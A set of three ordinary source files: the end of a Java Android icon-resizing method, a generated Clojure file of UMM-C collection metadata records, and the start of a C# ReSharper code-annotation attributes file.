painter.setIntrinsicHeight(height); } if (width > 0 && height > 0) { if (width < iconWidth || height < iconHeight) { final float ratio = (float) iconWidth / iconHeight; if (iconWidth > iconHeight) { height = (int) (width / ratio); } else if (iconHeight > iconWidth) { width = (int) (height * ratio); } final Bitmap.Config c = icon.getOpacity() != PixelFormat.OPAQUE ? Bitmap.Config.ARGB_8888 : Bitmap.Config.RGB_565; final Bitmap thumb = Bitmap.createBitmap(mIconWidth, mIconHeight, c); final Canvas canvas = mCanvas; canvas.setBitmap(thumb); // Copy the old bounds to restore them later // If we were to do oldBounds = icon.getBounds(), // the call to setBounds() that follows would // change the same instance and we would lose the // old bounds mOldBounds.set(icon.getBounds()); final int x = (mIconWidth - width) / 2; final int y = (mIconHeight - height) / 2; icon.setBounds(x, y, x + width, y + height); icon.draw(canvas); icon.setBounds(mOldBounds); icon = new BitmapDrawable(Resources.getSystem(), thumb); canvas.setBitmap(null); } else if (iconWidth < width && iconHeight < height) { final Bitmap.Config c = Bitmap.Config.ARGB_8888; final Bitmap thumb = Bitmap.createBitmap(mIconWidth, mIconHeight, c); final Canvas canvas = mCanvas; canvas.setBitmap(thumb); mOldBounds.set(icon.getBounds()); final int x = (width - iconWidth) / 2; final int y = (height - iconHeight) / 2; icon.setBounds(x, y, x + iconWidth, y + iconHeight); icon.draw(canvas); icon.setBounds(mOldBounds); icon = new BitmapDrawable(Resources.getSystem(), thumb); canvas.setBitmap(null); } } return icon; } }
{ "pile_set_name": "Github" }
;; WARNING: This file was generated from umm-c-json-schema.json. Do not manually modify. (ns cmr.umm-spec.models.umm-collection-models "Defines UMM-C clojure records." (:require [cmr.common.dev.record-pretty-printer :as record-pretty-printer])) (defrecord UMM-C [ ;; Information required to properly cite the collection in professional scientific literature. ;; This element provides information for constructing a citation for the item itself, and is not ;; designed for listing bibliographic references of scientific research articles arising from ;; search results. A list of references related to the research results should be in the ;; Publication Reference element. CollectionCitations ;; Controlled hierarchical keywords used to specify the spatial location of the collection. The ;; controlled vocabulary for spatial keywords is maintained in the Keyword Management System ;; (KMS). The Spatial Keyword hierarchy includes one or more of the following layers: Category ;; (e.g., Continent), Type (e.g. Africa), Subregion1 (e.g., Central Africa), Subregion2 (e.g., ;; Cameroon), and Subregion3. DetailedLocation exists outside the hierarchy. LocationKeywords ;; Dates related to activities involving the metadata record itself. For example, Future Review ;; date is the date that the metadata record is scheduled to be reviewed. MetadataDates ;; The Version Description of the collection. VersionDescription ;; This is deprecated and will be removed. Use LocationKeywords instead. Controlled hierarchical ;; keywords used to specify the spatial location of the collection. The controlled vocabulary for ;; spatial keywords is maintained in the Keyword Management System (KMS). The Spatial Keyword ;; hierarchy includes one or more of the following layers: Location_Category (e.g., Continent), ;; Location_Type (e.g. Africa), Location_Subregion1 (e.g., Central Africa), Location_Subregion2 ;; (e.g., Cameroon), and Location_Subregion3. SpatialKeywords ;; Identifies the topic categories from the EN ISO 19115-1:2014 Geographic Information – Metadata ;; – Part 1: Fundamentals (http://www.isotc211.org/) Topic Category Code List that pertain to ;; this collection, based on the Science Keywords associated with the collection. An ISO Topic ;; Category is a high-level thematic classification to assist in the grouping of and search for ;; available collections. ISOTopicCategories ;; The short name associated with the collection. ShortName ;; A brief description of the collection or service the metadata represents. Abstract ;; The language used in the metadata record. MetadataLanguage ;; Formerly called Internal Directory Name (IDN) Node (IDN_Node). This element has been used ;; historically by the GCMD internally to identify association, responsibility and/or ownership ;; of the dataset, service or supplemental information. Note: This field only occurs in the DIF. ;; When a DIF record is retrieved in the ECHO10 or ISO 19115 formats, this element will not be ;; translated. DirectoryNames ;; Suggested usage or purpose for the collection data or service. Purpose ;; Name of the two-dimensional tiling system for the collection. Previously called ;; TwoDCoordinateSystem. TilingIdentificationSystems ;; Describes key bibliographic citations pertaining to the collection. PublicationReferences ;; This element stores the DOI (Digital Object Identifier) that identifies the collection. Note: ;; The values should start with the directory indicator which in ESDIS' case is 10. If the DOI ;; was registered through ESDIS, the beginning of the string should be 10.5067. The DOI URL is ;; not stored here; it should be stored as a RelatedURL. The DOI organization that is responsible ;; for creating the DOI is described in the Authority element. For ESDIS records the value of ;; https://doi.org/ should be used. While this element is not required, NASA metadata providers ;; are strongly encouraged to include DOI and DOI Authority for their collections. DOI ;; This element describes any data/service related URLs that include project home pages, ;; services, related data archives/servers, metadata extensions, direct links to online software ;; packages, web mapping services, links to images, or other data. RelatedUrls ;; Dates related to activities involving the collection data. For example, Creation date is the ;; date that the collection data first entered the data archive system. DataDates ;; Information about the personnel responsible for this collection and its metadata. ContactPersons ;; Allows the author to constrain access to the collection. This includes any special ;; restrictions, legal prerequisites, limitations and/or warnings on obtaining collection data. ;; Some words that may be used in this element's value include: Public, In-house, Limited, None. ;; The value field is used for special ACL rules (Access Control Lists ;; (http://en.wikipedia.org/wiki/Access_control_list)). For example it can be used to hide ;; metadata when it isn't ready for public consumption. AccessConstraints SpatialExtent ;; Information about the personnel groups responsible for this collection and its metadata. ContactGroups ;; The data’s distinctive attributes of the collection (i.e. attributes used to describe the ;; unique characteristics of the collection which extend beyond those defined). AdditionalAttributes ;; This element and all of its sub elements exist for display purposes. It allows a data provider ;; to provide archive and distribution information up front to an end user, to help them decide ;; if they can use the product. ArchiveAndDistributionInformation ;; Controlled Science Keywords describing the collection. The controlled vocabulary for Science ;; Keywords is maintained in the Keyword Management System (KMS). ScienceKeywords ;; Free text description of the quality of the collection data. Description may include: 1) ;; succinct description of the quality of data in the collection; 2) Any quality assurance ;; procedures followed in producing the data in the collection; 3) indicators of collection ;; quality or quality flags - both validated or invalidated; 4) recognized or potential problems ;; with quality; 5) established quality control mechanisms; and 6) established quantitative ;; quality measurements. Quality ;; The title of the collection or service described by the metadata. EntryTitle ;; This element describes the production status of the data set. There are five choices for Data ;; Providers: PLANNED refers to data sets to be collected in the future and are thus unavailable ;; at the present time. For Example: The Hydro spacecraft has not been launched, but information ;; on planned data sets may be available. ACTIVE refers to data sets currently in production or ;; data that is continuously being collected or updated. For Example: data from the AIRS ;; instrument on Aqua is being collected continuously. COMPLETE refers to data sets in which no ;; updates or further data collection will be made. For Example: Nimbus-7 SMMR data collection ;; has been completed. DEPRECATED refers to data sets that have been retired, but still can be ;; retrieved. Usually newer products exist that replace the retired data set. NOT APPLICABLE ;; refers to data sets in which a collection progress is not applicable such as a calibration ;; collection. There is a sixth value of NOT PROVIDED that should not be used by a data provider. ;; It is currently being used as a value when a correct translation cannot be done with the ;; current valid values, or when the value is not provided by the data provider. CollectionProgress ;; For paleoclimate or geologic data, PaleoTemporalCoverage is the length of time represented by ;; the data collected. PaleoTemporalCoverage should be used when the data spans time frames ;; earlier than yyyy-mm-dd = 0001-01-01. PaleoTemporalCoverages ;; The reference frame or system in which altitudes (elevations) are given. The information ;; contains the datum name, distance units and encoding method, which provide the definition for ;; the system. This field also stores the characteristics of the reference frame or system from ;; which depths are measured. The additional information in the field is geometry reference data ;; etc. SpatialInformation ;; Identifies the collection as a Science Quality collection or a non-science-quality collection ;; such as a Near-Real-Time collection. CollectionDataType ;; Designed to protect privacy and/or intellectual property by allowing the author to specify how ;; the collection may or may not be used after access is granted. This includes any special ;; restrictions, legal prerequisites, terms and conditions, and/or limitations on using the item. ;; Providers may request acknowledgement of the item from users and claim no responsibility for ;; quality and completeness. Note: Use Constraints describe how the item may be used once access ;; has been granted; and is distinct from Access Constraints, which refers to any constraints in ;; accessing the item. UseConstraints ;; One or more words or phrases that describe the temporal resolution of the dataset. TemporalKeywords ;; Allows authors to provide words or phrases outside of the controlled Science Keyword ;; vocabulary, to further describe the collection. AncillaryKeywords ;; The identifier for the processing level of the collection (e.g., Level0, Level1A). ProcessingLevel ;; Information about the relevant platform(s) used to acquire the data in the collection. ;; Platform types are controlled in the Keyword Management System (KMS), and include Spacecraft, ;; Aircraft, Vessel, Buoy, Platform, Station, Network, Human, etc. Platforms ;; The name of the scientific program, field campaign, or project from which the data were ;; collected. This element is intended for the non-space assets such as aircraft, ground systems, ;; balloons, sondes, ships, etc. associated with campaigns. This element may also cover a long ;; term project that continuously creates new data sets — like MEaSUREs from ISCCP and NVAP or ;; CMARES from MISR. Project also includes the Campaign sub-element to support multiple campaigns ;; under the same project. Projects ;; The Version of the collection. Version ;; This class contains attributes which describe the temporal range of a specific collection. ;; Temporal Extent includes a specification of the Temporal Range Type of the collection, which ;; is one of Range Date Time, Single Date Time, or Periodic Date Time TemporalExtents ;; Information about the data centers responsible for this collection and its metadata. DataCenters ;; This element is used to identify other services, collections, visualizations, granules, and ;; other metadata types and resources that are associated with or dependent on the data described ;; by the metadata. This element is also used to identify a parent metadata record if it exists. ;; This usage should be reserved for instances where a group of metadata records are subsets that ;; can be better represented by one parent metadata record, which describes the entire set. In ;; some instances, a child may point to more than one parent. The EntryId is the same as the ;; element described elsewhere in this document where it contains and ID, and Version. MetadataAssociations ;; Describes the language used in the preparation, storage, and description of the collection. It ;; is the language of the collection data themselves. It does not refer to the language used in ;; the metadata record (although this may be the same language). DataLanguage ]) (record-pretty-printer/enable-record-pretty-printing UMM-C) ;; For paleoclimate or geologic data, PaleoTemporalCoverage is the length of time represented by the ;; data collected. PaleoTemporalCoverage should be used when the data spans time frames earlier than ;; yyyy-mm-dd = 0001-01-01. (defrecord PaleoTemporalCoverageType [ ;; Hierarchy of terms indicating units of geologic time, i.e., eon (e.g, Phanerozoic), era (e.g., ;; Cenozoic), period (e.g., Paleogene), epoch (e.g., Oligocene), and stage or age (e.g, ;; Chattian). ChronostratigraphicUnits ;; A string indicating the number of years furthest back in time, including units, e.g., 100 Ga. ;; Units may be Ga (billions of years before present), Ma (millions of years before present), ka ;; (thousands of years before present) or ybp (years before present). StartDate ;; A string indicating the number of years closest to the present time, including units, e.g., 10 ;; ka. Units may be Ga (billions of years before present), Ma (millions of years before present), ;; ka (thousands of years before present) or ybp (years before present). EndDate ]) (record-pretty-printer/enable-record-pretty-printing PaleoTemporalCoverageType) ;; This sub-element either contains a license summary or free-text description that details the ;; permitted use or limitation of this collection. (defrecord UseConstraintsDescriptionType [ ;; This sub-element either contains a license summary or free-text description that details the ;; permitted use or limitation of this collection. Description ]) (record-pretty-printer/enable-record-pretty-printing UseConstraintsDescriptionType) ;; Information about a collection with horizontal spatial coverage. (defrecord HorizontalSpatialDomainType [ ;; The appropriate numeric or alpha code used to identify the various zones in the collection's ;; grid coordinate system. ZoneIdentifier Geometry ;; Specifies the horizontal spatial extents coordinate system and its resolution. ResolutionAndCoordinateSystem ]) (record-pretty-printer/enable-record-pretty-printing HorizontalSpatialDomainType) ;; Contains the excluded boundaries from the GPolygon. (defrecord ExclusiveZoneType [ Boundaries ]) (record-pretty-printer/enable-record-pretty-printing ExclusiveZoneType) ;; Information about a two-dimensional tiling system related to this collection. (defrecord TilingIdentificationSystemType [ TilingIdentificationSystemName Coordinate1 Coordinate2 ]) (record-pretty-printer/enable-record-pretty-printing TilingIdentificationSystemType) ;; Specifies the geographic and vertical (altitude, depth) coverage of the data. (defrecord SpatialExtentType [ ;; Denotes whether the collection's spatial coverage requires horizontal, vertical, horizontal ;; and vertical, orbit, or vertical and orbit in the spatial domain and coordinate system ;; definitions. SpatialCoverageType HorizontalSpatialDomain VerticalSpatialDomains OrbitParameters GranuleSpatialRepresentation ]) (record-pretty-printer/enable-record-pretty-printing SpatialExtentType) ;; This element defines a mapping to the GCMD KMS hierarchical location list. It replaces ;; SpatialKeywords. Each tier must have data in the tier above it. (defrecord LocationKeywordType [ ;; Top-level controlled keyword hierarchical level that contains the largest general location ;; where the collection data was taken from. Category ;; Second-tier controlled keyword hierarchical level that contains the regional location where ;; the collection data was taken from Type ;; Third-tier controlled keyword heirarchical level that contains the regional sub-location where ;; the collection data was taken from Subregion1 ;; Fourth-tier controlled keyword heirarchical level that contains the regional sub-location ;; where the collection data was taken from Subregion2 ;; Fifth-tier controlled keyword heirarchical level that contains the regional sub-location where ;; the collection data was taken from Subregion3 ;; Uncontrolled keyword heirarchical level that contains the specific location where the ;; collection data was taken from. Exists outside the heirarchy. DetailedLocation ]) (record-pretty-printer/enable-record-pretty-printing LocationKeywordType) (defrecord LocalCoordinateSystemType [ ;; The information provided to register the local system to the Earth (e.g. control points, ;; satellite ephemeral data, and inertial navigation data). GeoReferenceInformation ;; A description of the Local Coordinate System and geo-reference information. Description ]) (record-pretty-printer/enable-record-pretty-printing LocalCoordinateSystemType) ;; This element defines a single artifact that is distributed by the data provider. This element ;; only includes the distributable artifacts that can be obtained by the user without the user ;; having to invoke a service. These should be documented in the UMM-S specification. (defrecord FileDistributionInformationType [ ;; Allows the provider to state whether the distributable item's format is its native format or ;; another supported format. FormatType ;; An approximate average size of the distributable item. This gives an end user an idea of the ;; magnitude for each distributable file if more than 1 exists. AverageFileSize ;; Conveys the price one has to pay to obtain the distributable item. Fees ;; This element defines a single format for a distributable artifact. Examples of format include: ;; ascii, binary, GRIB, BUFR, HDF4, HDF5, HDF-EOS4, HDF-EOS5, jpeg, png, tiff, geotiff, kml. Format ;; An approximate total size of all of the distributable items within a collection. This gives an ;; end user an idea of the magnitude for all of distributable files combined. TotalCollectionFileSize ;; The date of which this collection started to collect data. This date is used by users to be ;; able to calculate the current total collection file size. The date needs to be in the ;; yyyy-MM-ddTHH:mm:ssZ format; for example: 2018-01-01T10:00:00Z. TotalCollectionFileSizeBeginDate ;; Allows the record provider to provide supporting documentation about the Format. FormatDescription ;; Unit of measure for the total collection file size. TotalCollectionFileSizeUnit ;; Provides the data provider a way to convey more information about the distributable item. Description ;; Unit of measure for the average file size. AverageFileSizeUnit ;; This element defines the media by which the end user can obtain the distributable item. Each ;; media type is listed separately. Examples of media include: CD-ROM, 9 track tape, diskettes, ;; hard drives, online, transparencies, hardcopy, etc. Media ]) (record-pretty-printer/enable-record-pretty-printing FileDistributionInformationType) ;; This class defines the horizontal spatial extents coordinate system and the data product's ;; horizontal data resolution. The horizontal data resolution is defined as the smallest horizontal ;; distance between successive elements of data in a dataset. This is synonymous with terms such as ;; ground sample distance, sample spacing and pixel size. It is to be noted that the horizontal data ;; resolution could be different in the two horizontal dimensions. Also, it is different from the ;; spatial resolution of an instrument, which is the minimum distance between points that an ;; instrument can see as distinct. (defrecord ResolutionAndCoordinateSystemType [ ;; This element holds a description about the resoultion and coordinate system for people to ;; read. Description ;; This element describes the geodetic model for the data product. GeodeticModel ;; This class defines a number of the data products horizontal data resolution. The horizontal ;; data resolution is defined as the smallest horizontal distance between successive elements of ;; data in a dataset. This is synonymous with terms such as ground sample distance, sample ;; spacing and pixel size. It is to be noted that the horizontal data resolution could be ;; different in the two horizontal dimensions. Also, it is different from the spatial resolution ;; of an instrument, which is the minimum distance between points that an instrument can see as ;; distinct. HorizontalDataResolution ;; This element describes the local coordinate system for the data product. LocalCoordinateSystem ]) (record-pretty-printer/enable-record-pretty-printing ResolutionAndCoordinateSystemType) ;; Generic Resolutions object describes general resolution data for a data product where it is not ;; known if a data product is gridded or not. (defrecord HorizontalDataGenericResolutionType [ ;; The minimum difference between two adjacent values on a horizontal plane in the X axis. In ;; most cases this is along the longitudinal axis. XDimension ;; The minimum difference between two adjacent values on a horizontal plan in the Y axis. In most ;; cases this is along the latitudinal axis. YDimension ;; Units of measure used for the XDimension and YDimension values. Unit ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataGenericResolutionType) (defrecord BoundingRectangleType [ WestBoundingCoordinate NorthBoundingCoordinate EastBoundingCoordinate SouthBoundingCoordinate ]) (record-pretty-printer/enable-record-pretty-printing BoundingRectangleType) (defrecord LineType [ Points ]) (record-pretty-printer/enable-record-pretty-printing LineType) ;; This class defines a number of the data products horizontal data resolution. The horizontal data ;; resolution is defined as the smallest horizontal distance between successive elements of data in ;; a dataset. This is synonymous with terms such as ground sample distance, sample spacing and pixel ;; size. It is to be noted that the horizontal data resolution could be different in the two ;; horizontal dimensions. Also, it is different from the spatial resolution of an instrument, which ;; is the minimum distance between points that an instrument can see as distinct. (defrecord HorizontalDataResolutionType [ ;; Varies Resolution object describes a data product that has a number of resolution values. VariesResolution ;; Point Resolution object describes a data product that is from a point source. PointResolution ;; Non Gridded Resolutions object describes resolution data for non gridded data products. NonGriddedResolutions ;; Non Gridded Range Resolutions object describes range resolution data for non gridded data ;; products. NonGriddedRangeResolutions ;; Gridded Resolutions object describes resolution data for gridded data products. GriddedResolutions ;; Gridded Range Resolutions object describes range resolution data for gridded data products. GriddedRangeResolutions ;; Generic Resolutions object describes general resolution data for a data product where it is ;; not known if a data product is gridded or not. GenericResolutions ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionType) (defrecord ChronostratigraphicUnitType [ Eon Era Epoch Stage DetailedClassification Period ]) (record-pretty-printer/enable-record-pretty-printing ChronostratigraphicUnitType) (defrecord VerticalSpatialDomainType [ ;; Describes the type of the area of vertical space covered by the collection locality. Type ;; Describes the extent of the area of vertical space covered by the collection. Must be ;; accompanied by an Altitude Encoding Method description. The datatype for this attribute is the ;; value of the attribute VerticalSpatialDomainType. The unit for this attribute is the value of ;; either DepthDistanceUnits or AltitudeDistanceUnits. Value ]) (record-pretty-printer/enable-record-pretty-printing VerticalSpatialDomainType) (defrecord GeometryType [ CoordinateSystem Points BoundingRectangles GPolygons Lines ]) (record-pretty-printer/enable-record-pretty-printing GeometryType) ;; The reference frame or system from which altitude is measured. The term 'altitude' is used ;; instead of the common term 'elevation' to conform to the terminology in Federal Information ;; Processing Standards 70-1 and 173. The information contains the datum name, distance units and ;; encoding method, which provide the definition for the system. (defrecord AltitudeSystemDefinitionType [ ;; The identification given to the level surface taken as the surface of reference from which ;; measurements are compared. DatumName ;; The units in which measurements are recorded. DistanceUnits ;; The minimum distance possible between two adjacent values, expressed in distance units of ;; measure for the collection. Resolutions ]) (record-pretty-printer/enable-record-pretty-printing AltitudeSystemDefinitionType) ;; The longitude and latitude values of a spatially referenced point in degrees. (defrecord PointType [ Longitude Latitude ]) (record-pretty-printer/enable-record-pretty-printing PointType) ;; This element contains the Processing Level Id and the Processing Level Description (defrecord ProcessingLevelType [ ;; Description of the meaning of the Processing Level Id, e.g., the Description for the Level4 ;; Processing Level Id might be 'Model output or results from analyses of lower level data' ProcessingLevelDescription ;; An identifier indicating the level at which the data in the collection are processed, ranging ;; from Level0 (raw instrument data at full resolution) to Level4 (model output or analysis ;; results). The value of Processing Level Id is chosen from a controlled vocabulary. Id ]) (record-pretty-printer/enable-record-pretty-printing ProcessingLevelType) ;; Defines the minimum and maximum value for one dimension of a two dimensional coordinate system. (defrecord TilingCoordinateType [ MinimumValue MaximumValue ]) (record-pretty-printer/enable-record-pretty-printing TilingCoordinateType) (defrecord GPolygonType [ Boundary ExclusiveZone ]) (record-pretty-printer/enable-record-pretty-printing GPolygonType) ;; A boundary is set of points connected by straight lines representing a polygon on the earth. It ;; takes a minimum of three points to make a boundary. Points must be specified in counter-clockwise ;; order and closed (the first and last vertices are the same). (defrecord BoundaryType [ Points ]) (record-pretty-printer/enable-record-pretty-printing BoundaryType) ;; This element describes the geodetic model for the data product. (defrecord GeodeticModelType [ ;; The identification given to the reference system used for defining the coordinates of points. HorizontalDatumName ;; Identification given to established representation of the Earth's shape. EllipsoidName ;; Radius of the equatorial axis of the ellipsoid. SemiMajorAxis ;; The ratio of the Earth's major axis to the difference between the major and the minor. DenominatorOfFlatteningRatio ]) (record-pretty-printer/enable-record-pretty-printing GeodeticModelType) ;; The reference frame or system from which depth is measured. The information contains the datum ;; name, distance units and encoding method, which provide the definition for the system. (defrecord DepthSystemDefinitionType [ ;; The identification given to the level surface taken as the surface of reference from which ;; measurements are compared. DatumName ;; The units in which measurements are recorded. DistanceUnits ;; The minimum distance possible between two adjacent values, expressed in distance units of ;; measure for the collection. Resolutions ]) (record-pretty-printer/enable-record-pretty-printing DepthSystemDefinitionType) ;; This entity stores the reference frame or system from which horizontal and vertical spatial ;; domains are measured. The horizontal reference frame includes a Geodetic Model, Geographic ;; Coordinates, and Local Coordinates. The Vertical reference frame includes altitudes (elevations) ;; and depths. (defrecord SpatialInformationType [ VerticalCoordinateSystem ;; Denotes whether the spatial coverage of the collection is horizontal, vertical, horizontal and ;; vertical, orbit, or vertical and orbit. SpatialCoverageType ]) (record-pretty-printer/enable-record-pretty-printing SpatialInformationType) ;; Non Gridded Range Resolutions object describes range resolution data for non gridded data ;; products. (defrecord HorizontalDataResolutionNonGriddedRangeType [ ;; The minimum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MinimumXDimension ;; The minimum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MinimumYDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MaximumXDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MaximumYDimension ;; Units of measure used for the XDimension and YDimension values. Unit ;; This element describes the angle of the measurement with respect to the instrument that gives ;; an understanding of the specified resolution. ViewingAngleType ;; This element describes the instrument scanning direction. ScanDirection ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionNonGriddedRangeType) ;; This element defines a single archive artifact which a data provider would like to inform an end ;; user that it exists. (defrecord FileArchiveInformationType [ ;; Allows the provider to state whether the archivable item's format is its native format or ;; another supported format. FormatType ;; An approximate average size of the archivable item. This gives an end user an idea of the ;; magnitude for each archivable file if more than 1 exists. AverageFileSize ;; This element defines a single format for an archival artifact. Examples of format include: ;; ascii, binary, GRIB, BUFR, HDF4, HDF5, HDF-EOS4, HDF-EOS5, jpeg, png, tiff, geotiff, kml. Format ;; An approximate total size of all of the archivable items within a collection. This gives an ;; end user an idea of the magnitude for all of archivable files combined. TotalCollectionFileSize ;; The date of which this collection started to collect data. This date is used by users to be ;; able to calculate the current total collection file size. The date needs to be in the ;; yyyy-MM-ddTHH:mm:ssZ format; for example: 2018-01-01T10:00:00Z. TotalCollectionFileSizeBeginDate ;; Allows the record provider to provide supporting documentation about the Format. FormatDescription ;; Unit of measure for the total collection file size. TotalCollectionFileSizeUnit ;; Provides the data provider a way to convey more information about the archivable item. Description ;; Unit of measure for the average file size. AverageFileSizeUnit ]) (record-pretty-printer/enable-record-pretty-printing FileArchiveInformationType) ;; Orbit parameters for the collection used by the Orbital Backtrack Algorithm. (defrecord OrbitParametersType [ ;; Width of the swath at the equator in Kilometers. SwathWidth ;; Orbital period in decimal minutes. Period ;; Inclination of the orbit. This is the same as (180-declination) and also the same as the ;; highest latitude achieved by the satellite. Data Unit: Degree. InclinationAngle ;; Indicates the number of orbits. NumberOfOrbits ;; The latitude start of the orbit relative to the equator. This is used by the backtrack search ;; algorithm to treat the orbit as if it starts from the specified latitude. This is optional and ;; will default to 0 if not specified. StartCircularLatitude ]) (record-pretty-printer/enable-record-pretty-printing OrbitParametersType) ;; Gridded Range Resolutions object describes range resolution data for gridded data products. (defrecord HorizontalDataResolutionGriddedRangeType [ ;; The minimum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MinimumXDimension ;; The minimum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MinimumYDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plane in the X ;; axis. In most cases this is along the longitudinal axis. MaximumXDimension ;; The maximum, minimum difference between two adjacent values on a horizontal plan in the Y ;; axis. In most cases this is along the latitudinal axis. MaximumYDimension ;; Units of measure used for the XDimension and YDimension values. Unit ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionGriddedRangeType) ;; This element and all of its sub elements exist for display purposes. It allows a data provider to ;; provide archive and distribution information up front to an end user, to help them decide if they ;; can use the product. (defrecord ArchiveAndDistributionInformationType [ ;; This element defines a single archive artifact which a data provider would like to inform an ;; end user that it exists. FileArchiveInformation ;; This element defines a single artifact that is distributed by the data provider. This element ;; only includes the distributable artifacts that can be obtained by the user without the user ;; having to invoke a service. These should be documented in the UMM-S specification. FileDistributionInformation ]) (record-pretty-printer/enable-record-pretty-printing ArchiveAndDistributionInformationType) ;; Formerly called Internal Directory Name (IDN) Node (IDN_Node). This element has been used ;; historically by the GCMD internally to identify association, responsibility and/or ownership of ;; the dataset, service or supplemental information. Note: This field only occurs in the DIF. When a ;; DIF record is retrieved in the ECHO10 or ISO 19115 formats, this element will not be translated. (defrecord DirectoryNameType [ ShortName LongName ]) (record-pretty-printer/enable-record-pretty-printing DirectoryNameType) ;; Non Gridded Resolutions object describes resolution data for non gridded data products. (defrecord HorizontalDataResolutionNonGriddedType [ ;; The minimum difference between two adjacent values on a horizontal plane in the X axis. In ;; most cases this is along the longitudinal axis. XDimension ;; The minimum difference between two adjacent values on a horizontal plan in the Y axis. In most ;; cases this is along the latitudinal axis. YDimension ;; Units of measure used for the XDimension and YDimension values. Unit ;; This element describes the angle of the measurement with respect to the instrument that gives ;; an understanding of the specified resolution. ViewingAngleType ;; This element describes the instrument scanning direction. ScanDirection ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionNonGriddedType) ;; This element defines how the data may or may not be used after access is granted to assure the ;; protection of privacy or intellectual property. This includes license text, license URL, or any ;; special restrictions, legal prerequisites, terms and conditions, and/or limitations on using the ;; data set. Data providers may request acknowledgement of the data from users and claim no ;; responsibility for quality and completeness of data. (defrecord UseConstraintsType [ Description ;; This element holds the URL and associated information to access the License on the web. If ;; this element is used the LicenseText element cannot be used. LicenseUrl ;; This element holds the actual license text. If this element is used the LicenseUrl element ;; cannot be used. LicenseText ]) (record-pretty-printer/enable-record-pretty-printing UseConstraintsType) (defrecord VerticalCoordinateSystemType [ AltitudeSystemDefinition DepthSystemDefinition ]) (record-pretty-printer/enable-record-pretty-printing VerticalCoordinateSystemType) ;; Gridded Resolutions object describes resolution data for gridded data products. (defrecord HorizontalDataResolutionGriddedType [ ;; The minimum difference between two adjacent values on a horizontal plane in the X axis. In ;; most cases this is along the longitudinal axis. XDimension ;; The minimum difference between two adjacent values on a horizontal plan in the Y axis. In most ;; cases this is along the latitudinal axis. YDimension ;; Units of measure used for the XDimension and YDimension values. Unit ]) (record-pretty-printer/enable-record-pretty-printing HorizontalDataResolutionGriddedType)
{ "pile_set_name": "Github" }
 #pragma warning disable 1591 // ReSharper disable UnusedMember.Global // ReSharper disable UnusedParameter.Local // ReSharper disable MemberCanBePrivate.Global // ReSharper disable UnusedAutoPropertyAccessor.Global // ReSharper disable IntroduceOptionalParameters.Global // ReSharper disable MemberCanBeProtected.Global // ReSharper disable InconsistentNaming namespace IPFilter.UI.Annotations { using System; /// <summary> /// Indicates that the value of the marked element could be <c>null</c> sometimes, /// so the check for <c>null</c> is necessary before its usage /// </summary> /// <example><code> /// [CanBeNull] public object Test() { return null; } /// public void UseTest() { /// var p = Test(); /// var s = p.ToString(); // Warning: Possible 'System.NullReferenceException' /// } /// </code></example> [AttributeUsage( AttributeTargets.Method | AttributeTargets.Parameter | AttributeTargets.Property | AttributeTargets.Delegate | AttributeTargets.Field, AllowMultiple = false, Inherited = true)] public sealed class CanBeNullAttribute : Attribute { } /// <summary> /// Indicates that the value of the marked element could never be <c>null</c> /// </summary> /// <example><code> /// [NotNull] public object Foo() { /// return null; // Warning: Possible 'null' assignment /// } /// </code></example> [AttributeUsage( AttributeTargets.Method | AttributeTargets.Parameter | AttributeTargets.Property | AttributeTargets.Delegate | AttributeTargets.Field, AllowMultiple = false, Inherited = true)] public sealed class NotNullAttribute : Attribute { } /// <summary> /// Indicates that the marked method builds string by format pattern and (optional) arguments. /// Parameter, which contains format string, should be given in constructor. The format string /// should be in <see cref="string.Format(IFormatProvider,string,object[])"/>-like form /// </summary> /// <example><code> /// [StringFormatMethod("message")] /// public void ShowError(string message, params object[] args) { /* do something */ } /// public void Foo() { /// ShowError("Failed: {0}"); // Warning: Non-existing argument in format string /// } /// </code></example> [AttributeUsage( AttributeTargets.Constructor | AttributeTargets.Method, AllowMultiple = false, Inherited = true)] public sealed class StringFormatMethodAttribute : Attribute { /// <param name="formatParameterName"> /// Specifies which parameter of an annotated method should be treated as format-string /// </param> public StringFormatMethodAttribute(string formatParameterName) { FormatParameterName = formatParameterName; } public string FormatParameterName { get; private set; } } /// <summary> /// Indicates that the function argument should be string literal and match one /// of the parameters of the caller function. For example, ReSharper annotates /// the parameter of <see cref="System.ArgumentNullException"/> /// </summary> /// <example><code> /// public void Foo(string param) { /// if (param == null) /// throw new ArgumentNullException("par"); // Warning: Cannot resolve symbol /// } /// </code></example> [AttributeUsage(AttributeTargets.Parameter, AllowMultiple = false, Inherited = true)] public sealed class InvokerParameterNameAttribute : Attribute { } /// <summary> /// Indicates that the method is contained in a type that implements /// <see cref="System.ComponentModel.INotifyPropertyChanged"/> interface /// and this method is used to notify that some property value changed /// </summary> /// <remarks> /// The method should be non-static and conform to one of the supported signatures: /// <list> /// <item><c>NotifyChanged(string)</c></item> /// <item><c>NotifyChanged(params string[])</c></item> /// <item><c>NotifyChanged{T}(Expression{Func{T}})</c></item> /// <item><c>NotifyChanged{T,U}(Expression{Func{T,U}})</c></item> /// <item><c>SetProperty{T}(ref T, T, string)</c></item> /// </list> /// </remarks> /// <example><code> /// public class Foo : INotifyPropertyChanged { /// public event PropertyChangedEventHandler PropertyChanged; /// [NotifyPropertyChangedInvocator] /// protected virtual void NotifyChanged(string propertyName) { ... } /// /// private string _name; /// public string Name { /// get { return _name; } /// set { _name = value; NotifyChanged("LastName"); /* Warning */ } /// } /// } /// </code> /// Examples of generated notifications: /// <list> /// <item><c>NotifyChanged("Property")</c></item> /// <item><c>NotifyChanged(() =&gt; Property)</c></item> /// <item><c>NotifyChanged((VM x) =&gt; x.Property)</c></item> /// <item><c>SetProperty(ref myField, value, "Property")</c></item> /// 